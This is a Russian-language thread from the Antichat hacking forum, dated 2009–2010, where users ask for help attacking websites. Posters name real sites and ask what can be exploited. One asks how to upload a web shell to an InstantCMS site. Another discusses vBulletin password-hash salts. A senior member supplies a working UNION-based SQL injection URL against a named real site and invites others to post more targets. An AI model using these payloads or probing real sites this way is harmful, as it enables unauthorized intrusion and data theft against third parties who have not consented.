Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

24.11.2009, 23:13
|
|
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме: 9584
Репутация:
0
|
|
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto
возможно что нибудь сделать?
это хотяб бы баг? 
|
|
|

25.11.2009, 01:06
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме: 789539
Репутация:
53
|
|
кто нибудь знает как залить шел в Instantcms, доступ в админку есть.
|
|
|

25.11.2009, 01:15
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от growhel
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto
возможно что нибудь сделать?
это хотяб бы баг? 
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
|
|
|

25.11.2009, 01:57
|
|
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме: 9584
Репутация:
0
|
|
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto
оригинал
|
|
|

25.11.2009, 09:21
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от growhel
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto
оригинал
Эм
Код:
Ошибка: У Вас нет прав для доступа к этому модулю.
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
|
|
|

03.01.2010, 19:57
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме: 327555
Репутация:
1
|
|
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
|
|
|

03.01.2010, 20:39
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от FaTRuS
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
|
|
|

03.01.2010, 20:43
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от ErrorNeo
сабж
касается солей хэшей в Vbulletin
в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.
примеры 4-символьных солей
VBulletin:
Код:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?
Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:
Код:
\'*( - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью.
(&\\ - слуш экранируеться,так как последний слеш являеться частью соли.
Подругому не бывает 
ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();
Последний раз редактировалось m0Hze; 03.01.2010 в 20:47..
|
|
|

03.01.2010, 21:16
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме: 327555
Репутация:
1
|
|
www.prima-group.kz
|
|
|

03.01.2010, 21:29
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от FaTRuS
www.prima-group.kz
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|